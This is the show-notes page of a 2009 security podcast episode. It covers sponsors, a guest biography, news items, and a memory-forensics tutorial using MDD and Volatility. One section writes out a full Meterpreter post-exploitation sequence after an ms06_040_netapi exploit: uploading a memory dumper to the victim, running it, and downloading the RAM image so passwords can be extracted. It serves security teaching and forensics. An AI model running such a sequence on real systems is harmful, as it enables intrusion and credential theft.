Episode142

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!


Announcements & Shameless Plugs

Welcome to PaulDotCom Security Weekly, Episode 142, recording Thursday February 26th, 2009

You can find out about all of our events at http://pauldotcom.com/events/

  • commandlinekungfu.com - Ed Skoudis, Hal Pomeranz and the Pauldotcom team have teamed-up to bring you a new blog that focuses on command-line tips and tricks for Windows, Linux and Mac OS X.

Episode Media

mp3

Special Guest: Marcus Carey

Marcus J. Carey is the founder of the Sun Tzu Data, a Mid-Atlantic based Information Technology firm which specializes in Network Engineering, Network Defense Strategies, and Incident Response.

Prior to starting Sun Tzu Data, Marcus was employed by Computer Sciences Corp. (CSC) Global Security Solutions (GSS) organization. Marcus was assigned to the DC3's Defense Cyber Crime Investigations Training Academy (DCITA) as a Researcher and Instructor. Marcus' specialty at DCITA was Network Intrusions, Log Analysis, and Data Forensics.

Marcus served over eight years in the U.S. Navy Cryptologic Security Group. Marcus ended his naval service by being assigned to the National Security Agency (NSA) where he engineered, monitored, and defended Department of Defense's secure networks. Marcus has also earned a Master of Science in Network Security from Capitol College in Laurel, Maryland.

Reality Security Blog - Marcus' Blog

DojoSec

DojoSec - DojoSec is an exclusive Information Assurance Briefing and Training community founded by Marcus J. Carey. DojoSec is popular for its monthly briefings which provide a sampling of a major security conference in one night. DojoSec’s Monthly Briefings audience has seen talks by Johnny Long, Ron Gula, Joseph McCray, and Bruce Potter to name a few speakers. Attendees enjoy technical demonstrations, industry expert speakers, and a meal. It’s like a dinner theater for security geeks!

DojoSec Multimedia Archive - Video from past DojoSec events

Memory Analysis: The Good vs. The Bad

By Marcus J. Carey

Memory Analysis is at the bleeding edge of Incident Response and Data Forensics. Memory Analysis allows a first responder image the memory, which can reveals artifacts left by an intruder. Like many good security practices, Memory Analysis can also be used by the bad guys.

Imaging Memory with MDD

ManTech Memory DD (MDD) is released under GPL by Mantech International. MDD is capable of copying the complete contents of memory on the following Microsoft Operating Systems: Windows 2000, Windows XP, Windows 2003 Server, Windows 2008 Server.

After downloading MDD from the Mantech site you need to run the program at the command line.

MDD Command Line Usage:

mdd -o OUTPUTFILENAME

Example:


C:\tools\mdd>mdd -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

 -> Dumping 255.48 MB of physical memory to file 'memory.dd'.


 65404 map operations succeeded (1.00)
 0 map operations failed

 took 21 seconds to write
 MD5 is: a48986bb0558498684414e9399ca19fc

The output file is commonly referred to as an "image" . MDD function is limited to copying physical memory, so you will have to utilize another tool to analyze the memory image.

Analyzing Memory with Volatility Framework

Per Volatile Systems "The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples."

Volatility does not work with Windows Vista, however since many enterprises are still running Windows XP it can come in very handy. In order to practice analyzing memory with Volatility, I recommend you download the memory samples from NIST's website. I used the file "xp-laptop-2005-07-04-1430.img", which is contained in the NIST samples, in the examples that follow.

Original reference to Windows Python:

#!c:\python\python.exe

Example reference to Unix/Linux Python:

#!/usr/bin/python

If you need to change permissions in Unix/Linux type:

bash#chmod +x volatility

For options type:

./volatility

To see date and time of memory image:

bash-3.2# ./volatility datetime -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Image local date and time: Mon Jul 04 14:30:32 2005

Show the image information:

bash-3.2# ./volatility ident -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
              Image Name: /Volumes/OBI-TOO/Memory Images/xp-laptop-2005-07-04-1430.img
              Image Type: Service Pack 2
                 VM Type: nopae
                     DTB: 0x39000
                Datetime: Mon Jul 04 14:30:32 2005

To obtain a process list:

bash-3.2# ./volatility pslist -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Name                 Pid    PPid   Thds   Hnds   Time  
System               4      0      62     1133   Thu Jan 01 00:00:00 1970  
smss.exe             400    4      3      21     Mon Jul 04 18:17:26 2005  
csrss.exe            456    400    11     551    Mon Jul 04 18:17:29 2005 

Show connection information:

bash-3.2# ./volatility connections -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Local Address             Remote Address            Pid   
127.0.0.1:1037            127.0.0.1:1038            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  

Show all connections:

bash-3.2# ./volatility connscan -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
Local Address             Remote Address            Pid   
------------------------- ------------------------- ------ 

192.168.2.7:1147          212.58.240.145:80         3276  
192.168.2.7:1145          170.224.8.51:80           368   
3.0.48.2:18776            199.239.137.245:19277     2167698096
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1037            127.0.0.1:1038            3276  
192.168.2.7:1130          216.239.115.140:80        368   
192.168.2.7:1144          170.224.8.51:80           368   
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  
127.0.0.1:1038            127.0.0.1:1037            3276  
bash-3.2#

Dump executables:

bash-3.2# ./volatility procdump -f /Volumes/OBI-TOO/Memory\ Images/xp-laptop-2005-07-04-1430.img 
----
Snip
----
bash-3.2# ls
AUTHORS.txt		executable.1104.exe	executable.1844.exe	executable.2588.exe	executable.524.exe	forensics		vtypes.py
CHANGELOG.txt		executable.1272.exe	executable.1860.exe	executable.2692.exe	executable.536.exe	memory_objects		vtypes.pyc
CREDITS.txt		executable.1356.exe	executable.2196.exe	executable.3128.exe	executable.680.exe	memory_plugins		vutils.py
LEGAL.txt		executable.1380.exe	executable.2392.exe	executable.3192.exe	executable.712.exe	setup.py		vutils.pyc
LICENSE.txt		executable.1440.exe	executable.2456.exe	executable.3256.exe	executable.760.exe	thirdparty
MANIFEST		executable.1484.exe	executable.2472.exe	executable.3276.exe	executable.800.exe	vmodules.py
MANIFEST.in		executable.1548.exe	executable.2480.exe	executable.3300.exe	executable.840.exe	vmodules.pyc
PKG-INFO		executable.1564.exe	executable.2496.exe	executable.400.exe	executable.932.exe	volatility
README.txt		executable.1588.exe	executable.2524.exe	executable.456.exe	executable.972.exe	vsyms.py
README.win		executable.1640.exe	executable.2548.exe	executable.480.exe	executable.992.exe	vsyms.pyc

Check out SANS Forensics Blog for great post on finding hidden processes with Mandiant's Memoryze.

Stealing Memory with Metasploit's Meterpreter and MDD

After launching an exploit and receiving a Meterpreter connection, upload MDD.

                                           
meterpreter > upload /root/mdd.exe .
[*] uploading  : /root/mdd.exe -> .
[*] uploaded   : /root/mdd.exe -> .\mdd.exe
meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                   Name
----              ----       ----  -------------                   ----
100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys

Execute MDD to capture RAM on the victim machine.


meterpreter > execute -f "cmd.exe" -i -H
Process 1908 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\>mdd.exe -o memory.dd
mdd.exe -o memory.dd
 -> mdd
 -> ManTech Physical Memory Dump Utility
    Copyright (C) 2008 ManTech Security & Mission Assurance

 -> This program comes with ABSOLUTELY NO WARRANTY; for details use option `-w'
    This is free software, and you are welcome to redistribute it
    under certain conditions; use option `-c' for details.

 -> Dumping 511.48 MB of physical memory to file 'memory.dd'.


 130940 map operations succeeded (1.00)
 0 map operations failed

 took 23 seconds to write
 MD5 is: be9d1d906fac99fa01782e847a1c3144

c:\>

Verify memory image has been captured.

meterpreter > ls

Listing: c:\
============

Mode              Size       Type  Last modified                   Name
----              ----       ----  -------------                   ----
100777/rwxrwxrwx  0          fil   Thu Jan 01 00:00:00 +0000 1970  AUTOEXEC.BAT
100666/rw-rw-rw-  0          fil   Thu Jan 01 00:00:00 +0000 1970  CONFIG.SYS
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  Documents and Settings
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  IO.SYS
100444/r--r--r--  0          fil   Thu Jan 01 00:00:00 +0000 1970  MSDOS.SYS
100555/r-xr-xr-x  45124      fil   Thu Jan 01 00:00:00 +0000 1970  NTDETECT.COM
40555/r-xr-xr-x   0          dir   Thu Jan 01 00:00:00 +0000 1970  Program Files
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  System Volume Information
40777/rwxrwxrwx   0          dir   Thu Jan 01 00:00:00 +0000 1970  WINDOWS
100666/rw-rw-rw-  194        fil   Thu Jan 01 00:00:00 +0000 1970  boot.ini
100777/rwxrwxrwx  95104      fil   Thu Jan 01 00:00:00 +0000 1970  mdd.exe
100666/rw-rw-rw-  536330240  fil   Thu Jan 01 00:00:00 +0000 1970  memory.dd
100444/r--r--r--  222368     fil   Thu Jan 01 00:00:00 +0000 1970  ntldr
100666/rw-rw-rw-  402653184  fil   Thu Jan 01 00:00:00 +0000 1970  pagefile.sys

Download memory using Meterpreter.

meterpreter > download memory.dd .
[*] downloading: memory.dd -> .
[*] downloaded : memory.dd -> ./memory.dd

meterpreter > exit

[*] Meterpreter session 1 closed.
msf exploit(ms06_040_netapi) > ls *.dd
[*] exec: ls *.dd

memory.dd
msf exploit(ms06_040_netapi) >   

Now you can utilize instructions from http://forensiczone.blogspot.com/2009/01/using-volatility-1.html to grab the password dump out of memory.

Resources

Tech Segment: Metasploit Cheat Sheet

Metasploit Cheat Sheet - Based on my recent teaching of the Metasploit course for SANS, this is a collection of tips and tricks for Metasploit. Many have been discussed on the podcast before, and some have not. I've included mini-tutorials and links to tech segments on:

  • "Karmetasploit"
  • WPAD Mitm Attacks and smb_relay
  • Incognito Token Passing
  • Bypassing Anti-Virus with msfpayload and msfencode
  • Meterpreter information gathering extensions (Darkoperator)
  • db_autopwn usage and tips

I think I may replace the screenshots with actual text so people can copy paste, but then on the other hand its good practice to enter the commands manually.

Additional Resources

www.oldapps.com - Repository of older applications available for free download.

Stories For Discussion

1) Bill proposes ISPs, Wi-Fi keep logs for police - [PSW] - Proposed federal law that would require ISPs, hotels, Wi-FI hot spots, and home users to keep user records for two years to aid police investigations.

2) WHY Netgear, WHY! - [Larry] - Wow, this is a trivial Admin interface DoS. How trivial? Add a "?" to the end of the admin url, and the interface becomes available until a reboot. The device still functions, but there is no way to manage it.

3) Shame on Cisco - [Larry] - Nice, want to manage the ACE Application Control Engine Device Manager remotely? It should be easy, as Cisco included default usernames and passwords for the application and the MySQL database backend. During install, there is no prompting to change them. Wow, being able to take control of a web app load balancer and Cisco 6500 and 7000 series switch has some interesting possibilities for attacks...

4) GPS anyone - [Larry] - I found this use of GPS interesting, given that consumer GPS nav units appear to have been forensically analyzed to determine recorded locations to prosecute folks in crimes. What about utilizing GPS for other information gathering. See next week...

5) SheevaPlug - [Larry] - This looks like a promising platform for a bunch of penetration type tasks. How about a $50 - $100 linux box self contained in a wall wart type form factor - ethernet, and USB ports available (looks like SD card as well. I can envision using a device like this for remote wireless assessment (hiding a rogue anyone?) vis a USB wireless dongle. How about a pivot point for dropping on a customer LAN?

6) Not just Adobe Reader - [Larry] - A brief analysis of what happens when the new malicious PDFs with malformed JBIG2 streams are thrown at other applications. It looks like crashes are possible with other apps including Preview and Finder under OSX as well as some crashes on the iPhone. Linux analysis coming soon. On another note disabling JavaScript processing in the reader can help mitigate the issue, but doesn't solve the root of the problem. Here's how to do that. There are also a few third party patches...some from big names like Sourcefire. I'd like to talk about those third party patches, and about backing/distribution from reputable companies.

7) MS fixing autorun disable - [Larry] - Thanks microsoft. We talked about this during some of our Conficker/Downadup conversations.

8) Web Application Incident Handling - [John] - One of the great tragedies of information security is that it has been reduced to a series of tools that we rely on as professionals. IDS/IPS, SIM, AV... Many of us have become far to dependent on a specific set of tools. The inverse is also true. If there is not a tool that "Does it for us" we tend to not look at that specific area of our network. Web applications are no exception. This is a great post by the folks at ts/sci. It will get you started in how to approach your web applications logs, and some cool tools to help.

9) Consumer Data Losses: 100 Times Worse According to New Report - [John] - A good read. Don't let all of the the statistics and math scare you off. The author is an academic and I don't hold that against him. What I want you to read and focus on is this; many of the reported breaches we deal with are from medium and large organizations. We hear very little about smaller organizations. Is that because they are more secure? I think not.

10) M$ is looking to kill autorun - [John] - We have discussed the various problems of autorun for a few years now. It looks like conflicker/downandup has pushed MS to the edge. I hate to say it but I am a bit sad. Yea it is great for security, but I have used this on quite a few pentests. I know that is selfish.... But.. Sniff...

11) Pwn2Own 2009 style - [John] - The pwn2own is up. Basically, you hack it, and you make some money. I like how the surface is being expanded this year. Rather then simply attacking OSes they are going after browsers (which was one of the attack vectors from last year) and.... Mobile devices!!! Sweet! I see this as one of the next big areas in IT security. Hopefully, this leads to a bit more exposure to the topic of mobile device security. Looks like CanSec West will be hopping this year.

12)Digital TV and Personal Information - [John] - Another great blog post from Sherri. Apparently the discount cards they are giving out to people have their names encoded on the Mag strip. But I am sure that the retailers need to protect that data.... Right?

13) Getting To Know Your Inner Command Line Kung Fu - [PaulDotCom] - We've teamed up with some incedibly smart people, Ed Skoudis & Hal Pomeranz, to create the ultimate resource for command line Kung Fu. The goal is to provide useful commands, be cross platform, and have each member comment and improve/modify each other's commands. Its the only site that I've seen attempting to cover commands on each platform. For example, Ed will post a Windows command, then Hal and I will discuss how to do it on UNIX/Linux. We are limiting ourselves to OS commands, with a few exceptions (But no perl or Windows Power Shell). Props to Byte_Bucket for helping to administer and moderate.

14) Adobe Vulnerability Was Known For Months - [PaulDotCom] - If you are one of the people knocking Sourcefire for posting information about this vulnerability, SHAME on you. When you can provide concrete evidence that the attackers do not have an exploit for a vulnerability, come talk to me. Did you interview all the underground attackers? The arguement just doesn't hold water. If a 0day exploit is in the wild, the community needs to know enough information to defend themselves. Hey, sometimes that leads to an exploit that is more prevelent, but at least we can defend ourselves. Keeping 0day's a secret only hurts us more, how many people were pwned before this became public? How do you even collect that information on an exploit thats months old? How many people formatted Grandma's computer and had her sign up for fraud alert in that time? Oh, and then Adobe falls flat on its face and doesn't release a patch so Sourcefire releases one for them. Just aweful!

15) Pwn2Own Mobile Phones Edition - [PaulDotCom] - This is right on, so many people are using mobile phones to browse the web, its time we brought attention to the vulnerabilities that exist.

16) Cool Command: Connect Mic to remote speaker - [PaulDotCOm] - This is a neat little command that will take input from mic and output it to the speakers of a remote Linux computer. Imagine on a pen test, "I own your computer, to get it back you must dance for me, dance for me fool, dance!" Of course owning the webcam is a must in this situation as well.

17) Wyndham Hotels Hacked - [PaulDotCom] - I love this part "The breach was the result of an attacker using a "centralised network connection" at one of the franchises, to access and download the information from 41 Wyndham properties.". So this means that someone lived near one of these hotels and used the wireless to access the entire corporate network. Or, even better, implant a device inside the hotel (in the wall jack) and have it provide a reverse shell, and hack in that way. In either case there are certain organziations, like hotels, that cannot afford to have a chewy center. There is too much at risk, and its too easy for attackers to gain access to the internal network. They should *completely* separate the guest networks from corporate networks, however that doesn't stop someone from hacking into a switch, or pwning one of the management computers from some other mechanism (USB thumb drive, wireless).

18) CCCKC Hacking Event - [PaulDotCom] - If you are in KC, you should check this out.

Other Stories of Interest

WiFi Speed Spray (tm) - [IRC] - This revolutionary product is guaranteed to enhance the transfer of computer data through the air.